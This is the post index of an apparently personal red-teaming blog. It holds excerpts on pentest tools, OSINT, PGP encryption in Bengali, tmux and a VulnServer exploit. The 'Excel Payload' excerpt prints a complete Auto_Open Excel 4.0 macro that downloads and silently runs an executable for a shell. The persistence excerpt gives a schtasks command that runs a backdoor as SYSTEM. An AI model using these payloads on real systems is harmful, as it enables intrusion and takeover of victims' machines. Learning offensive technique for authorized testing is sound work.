}}

Blog

  • Top 5 red Teaming Training and Certifications

    It is Red Teaming. Huh? Wow, What is Red Teaming? It is about acting as real cyber threats to attack organizations from different angles to find weaknesses and report to the internal team. The Red team is highly skilled in taking advantage of Human, Technical, and physical weaknesses. So, what is usually involved with Red Teaming? Before having a quick look, be informed that It is crucial to bypass the defense and perform every step in stealth mode.

    Read more →
  • পিজিপি দিয়ে ইমেইল ও ডাটা এনক্রিপ্ট করা

    বাংলাদেশে অনেকেই এখন এথিক্যাল হ্যাকিং শিখতে আগ্রহী। বাজার প্রসার হচ্ছে। আমরা এথিক্যাল হ্যাকিং শিখি অন্যদের তথকে সুরক্ষিত রাখতে। কিন্তু আমরা কি আমাদের নিজেদের সুপার সিক্রেট মেসেজকে কিভাবে সিক্রেট রাখতে হয় তা জানি? আমার প্রিয় একটা পদ্ধতি হলো “PGP দিয়ে মেসেজ/ইমেইল/টেক্সট এনক্রিপট করা”। এনক্রিপশন হয়তো অনেকে জানে, আবার হয়তো কেউ কেউ জানেই না। এমনকি জিমেইল, ইয়াহু, হটমেইল থেকেও? অনেকে হয়তো বলবে “ধুর, ওদের কি সময় আছে আমার মেসেজ দেখার? আর দেখলেও বা কি হবে” তাই প্লেইন টেক্সট মেসেজ-ই সেন্ড করে। যেদিন আপনাকে ফোর্সফুলি কোনো ডাটা এনক্রিপ্ট/ডিক্রিপ্ট করতে হবে সেদিন হয়তো এটার উপর টিউটোরিয়াল গুগল-এ সার্চ করতে হবে। যাইহোক, থিওরি একদম ভালো লাগে না।

    Read more →
  • Windows Persistence Cheatsheet

    Here are some common methods for maintaining access. If you find any errors or need to update anything, please mail me! Schedule Task We can create schedule to execute our specified binary or command. For example if we want to execute UpdateMessenger.exe every two hour. We can use below methods. Native Windows Command Upload your backdoor and run following command: schtasks /create /sc hourly /mo 2 /tn "UpdateMessenger" /tr C:\Windows\Tasks\UpdateMessenger.exe /ru "SYSTEM" Using SharPersist .

    Read more →
  • Red Team Tools Collection

    This is a collection of red teaming tools that will help in red team engagements. The list is not complete, so i will keep updating it! Reconnaissance These tools are used to gather information passively or actively. Tools Name Descriptions Nmap Port/Service/Vulnerability Scanner DnsRecon, Amass DNS Enumeration Tool Nikto Website Misconfiguration Finder Burp Suite Pro Web Analyzing Semi-auto Tool theHarvester Find sub-domain, email address and employee info Metgoofil Extract pdf,doc,xls, etc SpiderFoot Open-source Information Gathering framework Recon-ng Open-source Information Gathering framework Weaponization & Initial Foothold Cracking Password Password attacking tools for initial footholds

    Read more →
  • Microsoft Excel Payload

    Microsoft Excel Payload for initial foothold is old method but still widely used by APTs. Microsoft Excel 4.0 Macro Payload Right click on the workbook and click insert Select MS Excel 4.0 Macro paste following payload: =EXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.8.168:8000/20.exe -outfile c:\users\public\20.exe") =WAIT(NOW()+"00:00:10") =EXEC("powershell -ep Bypass -W Hidden c:\users\public\20.exe") =HALT() Now Select first cell and rename it to Auto_Open Save as Excel 97-2003 Workbook(XLS) When victim Enable Content We get shell

    Read more →
  • PoshC2 Commands Reference

    PoshC2 is an open-source command and control framework written in python3 which can be downloaded from https://github.com/nettitude/PoshC2. I was learning about this framework. Need to study more ;). But yeah, here some command i tested to see how they works! The PoshC2 command i have referenced here can be found using help command. This is just a few important command i have noted here(Nothing special)! I will add other commands when try them in my lab.

    Read more →
  • Active Reconnaissance

    Active Reconnaissance is the method of gathering information directly from the targets. Be aware, This information gathering method may get logged by IDS, IPS, and EDR. DNS Enumeration Sn1per This is a tool to use other open source tools for automated information gathering. Download Sn1per. Zone Transfer If zone transfer is misconfigured, all address will be discovered host -l ns google.com dnsrecon -d microsoft Discover Subdomain dnsenum -f namelist.txt microsoft.com sublist3r -o output.

    Read more →
  • Open Source Intelligence(OSINT)

    The purpose of OSINT is collecting information as much as possible, without directly interacting to the target! Note: The methods included here is not a complete OSINT methods What Hackers Collect? The information collected by them can be divided in two categories Business Information These information is all about the target company. For example What kind business the company is running. What is their activities. Partners and Investors information. Company Departments.

    Read more →
  • Tmux Cheat Sheet

    Tmux is a wonderful multiplexer and very useful tool for a penetration tester and red teamers. I use it a lots. Here i have noted most used tmux command for future reference! Custom .tmux.conf unbind C-b unbind '"' unbind % set-option -g prefix C-a bind-key C-a send-prefix bind h split-window -h bind v split-window -v set -g default-terminal "screen-256color" set -g message-style fg=white,bold,bg=red set -g status-style fg=white,bg=red set -g pane-border-style fg=red set -g pane-active-border-style "bg=red fg=green" set -g mouse on Session Here is some session management command

    Read more →
  • Useful Keyboard Shortcut in Linux

    If we want to work faster we need to know keyboard shortcuts. Always using mouse sometime boring. Even though, I don’t know all keyboard shortcuts. I am going to keep the common used keyboard shortcut! Shortcut in Debian Linux These shortcut works on Debina based Linux and Gnome Navigation Super+Shift+Left/Right Move window to left/right monitor Ctrl+Alt+Tab Switch System Controls Super+Tab Switch Applications Alt+Esc Switch Window Directly System Super+L Lock Screen Super+A Show All Notifications Alt+F2 Run Command Prompt Supper or Super+s Overview Logout Ctrl+Alt+Delete Window Alt+F7 Move Window Alt+F8 Resize Window Alt+Up/Down Restore Window Super+Left/Right Split on Left/Right Alt+F4 Close Window Super+h Hide Window Application Shortcut If the applications are gnome based, same shortcut should work on different distros

    Read more →
  • Essential Tools for Penetration Tester

    Every penetration tester, white hat hacker, red teamer required to use tools. Tools make our process easier. I will list my favorite tools with short description for future reference! If you think i have missed anything here, please let me know. I will update the post! Enumeration Information Gathering and Enumeration is the first stage for good and bad hackers. Enumerating using some opensources tools speed up the process. Here are some tools used for enumeration.

    Read more →
  • Stack Overflow EGG Hunting(VulnServer)

    There are some situation when our shellcode does not fit in small memory space. In this case we might be able to store our payload into a bigger memory address. But how we find the address? It is EGG which find the shellcode location by searching specific string(Tag) and start executing the code right after the tag. I will Vulnerable application: https://github.com/stephenbradshaw/vulnserver Crash POC: import socket vulCommand = b"KSTET \r\n" buffer = b"A"*1000 s = socket.

    Read more →